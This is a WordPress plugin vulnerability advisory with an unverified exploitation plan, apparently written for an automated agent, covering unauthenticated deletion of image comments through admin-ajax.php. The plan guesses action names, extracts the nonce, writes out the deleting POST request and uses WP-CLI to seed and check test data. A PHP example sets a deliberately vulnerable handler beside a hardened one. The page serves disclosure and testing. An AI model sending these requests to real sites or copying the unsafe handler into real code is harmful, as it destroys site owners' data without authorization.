CVE-2026-1036

Photo Gallery by 10Web – Mobile-Friendly Image Gallery <= 1.8.36 - Missing Authorization to Unauthenticated Arbitrary Comment Deletion

Severity: medium
Type: Missing Authorization
CVSS Score: 5.3
Patched in: 1.8.37
Time to patch: 1d

Description

The Photo Gallery by 10Web – Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the delete_comment() function in all versions up to, and including, 1.8.36. This makes it possible for unauthenticated attackers to delete arbitrary image comments. Note: comments functionality is only available in the Pro version of the plugin.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <=1.8.36
Published: January 21, 2026
Last updated: January 21, 2026
Affected plugin: photo-gallery

Source Code

WordPress.org SVN
Research Plan (Unverified)


This research plan targets CVE-2026-1036, a missing authorization vulnerability in the "Photo Gallery by 10Web" plugin. Since specific source files were not provided, this plan is based on the vulnerability description and known architecture of the Photo Gallery plugin.

1. Vulnerability Summary

The Photo Gallery by 10Web plugin (versions <= 1.8.36) fails to implement capability checks or adequate nonce validation on its comment deletion functionality. Specifically, the function delete_comment() is accessible via an AJAX action that lacks current_user_can() checks. Because the plugin registers this action for unauthenticated users (via wp_ajax_nopriv_*), an attacker can delete any comment from any image gallery simply by knowing the comment's database ID.

2. Attack Vector Analysis

  • Endpoint: http://<target>/wp-admin/admin-ajax.php
  • Action (Inferred): bwg_delete_comment or a generic handler like bwg_frontend_ajax with a task parameter.
  • Payload Parameter: id (The database ID of the comment to delete).
  • Authentication: None required (Unauthenticated).
  • Preconditions:
    • The "Comments" feature must be active (usually a Pro feature, but the code exists in many versions).
    • At least one comment must exist on an image.

3. Code Flow (Inferred)

  1. Registration: The plugin likely registers the AJAX hook in a controller or main file:
    add_action('wp_ajax_nopriv_bwg_delete_comment', array($this, 'delete_comment'));
  2. Handler: The delete_comment() function (likely in frontend/models/BWGModelComments.php or admin/models/BWGModelComments.php) is invoked.
  3. Missing Check: Inside delete_comment(), the code proceeds to perform a database deletion without verifying:
    • If a valid nonce is provided (check_ajax_referer).
    • If the requester has administrative privileges (current_user_can('manage_options')).
  4. Sink: The code calls $wpdb->delete($wpdb->prefix . 'bwg_image_comment', array('id' => $id));.
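The missing-check pattern described in steps 1 to 4, shown beside the handler shape that closes it, as an added illustration written for this page rather than the plugin's own source. The action, function, script-handle and table names (example_delete_comment, example_image_comment, example-gallery) are assumed placeholders.

```php
<?php
// Added illustration for this page, not the plugin's own source; the action,
// function and table names below are assumed placeholders.
// Vulnerable shape: reachable by anyone (wp_ajax_nopriv_) and deletes whatever
// row id the request names, with no nonce and no capability check.
add_action( 'wp_ajax_nopriv_example_delete_comment', 'example_delete_comment_unsafe' );
add_action( 'wp_ajax_example_delete_comment', 'example_delete_comment_unsafe' );
function example_delete_comment_unsafe() {
    global $wpdb;
    $id = isset( $_POST['id'] ) ? intval( $_POST['id'] ) : 0;
    $wpdb->delete( $wpdb->prefix . 'example_image_comment', array( 'id' => $id ), array( '%d' ) );
    wp_send_json_success();
}

// Hardened shape: no nopriv registration, so WordPress only routes the action
// for logged-in users; the handler then checks a nonce minted for this exact
// action (see wp_create_nonce below), a moderation capability, and the id.
add_action( 'wp_ajax_example_delete_comment_safe', 'example_delete_comment_safe' );
function example_delete_comment_safe() {
    global $wpdb;
    // CSRF protection: check_ajax_referer() dies with HTTP 403 if the 'nonce'
    // field is missing or was not created for 'example_delete_comment'.
    check_ajax_referer( 'example_delete_comment', 'nonce' );
    // Authorization: removing other users' comments is a moderation action.
    if ( ! current_user_can( 'moderate_comments' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }
    // Input validation: only a positive integer id is acceptable.
    $id = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;
    if ( 0 === $id ) {
        wp_send_json_error( array( 'message' => 'invalid id' ), 400 );
    }
    $table   = $wpdb->prefix . 'example_image_comment';
    $deleted = $wpdb->delete( $table, array( 'id' => $id ), array( '%d' ) );
    if ( false === $deleted ) {
        wp_send_json_error( array( 'message' => 'database error' ), 500 );
    }
    // $deleted is the number of rows removed (0 when the id did not exist).
    wp_send_json_success( array( 'deleted' => (int) $deleted ) );
}

// The nonce the safe handler expects is minted server-side for the logged-in
// user and handed to the page script; it is never valid for anonymous visitors.
add_action( 'wp_enqueue_scripts', function () {
    wp_localize_script( 'example-gallery', 'exampleGallery', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'example_delete_comment' ),
    ) );
} );
```

The nonce only binds the request to a logged-in session and blocks CSRF; it is the current_user_can() check that decides who may delete, and that is the check the advisory reports as missing.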

4. Nonce Acquisition Strategy

If the plugin attempts to verify a nonce, it is likely exposed to unauthenticated users on pages containing a gallery.

  1. Identify Trigger: The comments functionality is triggered by the [bwg_gallery] shortcode when the show_comments attribute is enabled.
  2. Setup Page:
    wp post create --post_type=page --post_status=publish --post_title="Gallery Test" --post_content='[bwg_gallery id="1" show_comments="1"]'
  3. Navigate: Use browser_navigate to view the newly created page.
  4. Extract Nonce: Photo Gallery typically localizes its data into an object named bwg_objectsL10n or bwg_params.
    • Check for: browser_eval("window.bwg_objectsL10n?.bwg_nonce")
    • Check for: browser_eval("window.common_ajax_nonce")
  5. Bypass Note: If wp_ajax_nopriv_ is used without any check_ajax_referer call, no nonce is required.

5. Exploitation Strategy

The agent should attempt the following unauthenticated POST request:

  • URL: http://<target>/wp-admin/admin-ajax.php
  • Method: POST
  • Content-Type: application/x-www-form-urlencoded
  • Parameters:
    • action: bwg_delete_comment (Primary guess based on naming convention)
    • id: [COMMENT_ID] (The ID of the comment to be deleted)
    • nonce: [EXTRACTED_NONCE] (Optional, if found)

Refined Guess (Common Photo Gallery AJAX structure):
If the direct action fails, the plugin often uses a task-based router:

  • action: bwg_frontend_ajax
  • ajax_task: delete_comment
  • id: [COMMENT_ID]

6. Test Data Setup

To verify the vulnerability, the environment must contain an existing comment:

  1. Ensure Plugin is Active: wp plugin activate photo-gallery
  2. Create a Gallery and Image: (Assuming some existing content or using WP-CLI to insert into custom tables).
  3. Manually Insert a Comment:
    wp db query "INSERT INTO wp_bwg_image_comment (image_id, author, mail, comment, published) VALUES (1, 'Victim', 'victim@example.com', 'This is a valid comment', 1);"
    
  4. Record the ID: Get the ID of the inserted comment:
    wp db query "SELECT id FROM wp_bwg_image_comment WHERE author='Victim' LIMIT 1;"
    

7. Expected Results

  • Success Response: The server returns a 200 OK response, potentially with a JSON body like {"status":"success"} or a simple integer 1.
  • Database Effect: The row corresponding to the id in the wp_bwg_image_comment table is removed.

8. Verification Steps

After sending the exploit request, verify the deletion via WP-CLI:

  1. Check Table:
    wp db query "SELECT COUNT(*) FROM wp_bwg_image_comment WHERE author='Victim';"
    
  2. Criteria: If the count is 0, the exploit is successful.

9. Alternative Approaches

If the wp_ajax_nopriv_bwg_delete_comment action is not found:

  1. Search for Task Names: Search the plugin directory for the string "delete_comment" to find the exact AJAX action or ajax_task parameter name:
    grep -r "delete_comment" /var/www/html/wp-content/plugins/photo-gallery/
  2. Check for Admin-only version: If the nopriv hook is missing, check if the wp_ajax_ hook (authenticated) fails to check for current_user_can(). If so, the vulnerability would require a Subscriber-level account (Minimal Authentication).
  3. Trace Controller: Look into photo-gallery/admin/controllers/BWGControllerComments.php to see how the execute() or delete() methods are invoked.
